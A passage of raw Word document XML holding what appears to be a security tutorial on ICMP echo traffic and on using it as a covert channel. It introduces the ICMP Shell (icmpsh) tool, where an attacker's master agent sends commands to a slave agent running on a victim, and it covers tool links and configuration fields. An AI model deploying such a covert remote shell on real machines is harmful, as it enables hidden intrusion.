        </w:rPr>
        <w:t>ECHO RESPONSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>. Images below show the PING echo request-response communication taking place between two network devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9B3FA"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noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56CF3592" wp14:editId="664703D2">
            <wp:extent cx="5943600" cy="161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14:paraId="703A71E2" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 4: Ping echo request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FD2E1"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noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6A6AB3" wp14:editId="068C45F3">
            <wp:extent cx="5943600" cy="1612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12900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9CB3D" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 5: Ping echo response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B6EAA2"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lastRenderedPageBreak/>
        <w:t>Looking at the ping echo request and response, we can see that the ping echo request ICMP packet sent by network device A (10.0.0.7) contains 48 bytes of data. Network device B (10.0.0.8) replies with a ping echo response with the same 48 bytes of data. See the image below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C540BE9"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noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E64247D" wp14:editId="72D8A580">
            <wp:extent cx="5943600" cy="1073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73150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F59D94A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 6: ICMP header format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1B815"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As you can see, the packet does not contain source and destination port numbers like TCP and UDP header formats. Hence, echo request-response communication is taking place between the network devices, but not over specific port(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FF36A"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The above discussion laid down little idea that ICMP communication can be used to contact between two devices using a custom agent running on victim and attacking devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A1807"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The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C989B50"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The server ICMP Agent sends ICMP packets to connect to the victim running a custom ICMP agent and sends it commands to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B0C93" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C521463" wp14:editId="73E50196">
            <wp:extent cx="5943600" cy="927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27100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E4C4D" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 7: Command execution over ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C720B34" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Nico Leidecker </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="297AA0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>http://www.leidecker.info/downloads/index.shtml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>) has been kind enough to build ICMP Shell, which runs on a master-slave model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E248CA8"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Master is the server ICMP agent (attacker) and slave is the client ICMP agent (victim).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34B670"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At present, the client agent supports Windows platforms only (EXE file) and the client agent can be run on any platform using C, Perl and Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047C360" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="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ICMP Shell can be found on GitHub here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="297AA0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://github.com/interference-security/icmpsh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F07CC" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Note: Forked and modified from </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="297AA0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://github.com/inquisb/icmpsh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B19B7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>“icmp-s.c” </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>is the slave file which is run on victim machine on which remote command execution is to be achieved. This C code, when compiled and executed, asks the user to enter required details as command line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06965E05" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="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w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>icmp-slave-complete.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>” is the complete slave file which has hard-coded values of required details so that command line arguments are not needed and the compiled executable can be executed directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1A5CE"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ICMP Shell requires the following details:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8700" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1395"/>
        <w:gridCol w:w="2095"/>
        <w:gridCol w:w="5210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00835152" w:rsidRPr="00835152" w14:paraId="73BC208D" w14:textId="77777777" w:rsidTr="00835152">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4162AE52" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Line No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01C65B81" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B123EE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835152" w:rsidRPr="00835152" w14:paraId="57348B14" w14:textId="77777777" w:rsidTr="00835152">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1339AFD2" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="271AC2AA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B3CC82"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6EED5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="105" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="105" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48AAB026" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00835152">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>IP address of the attacker’s machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
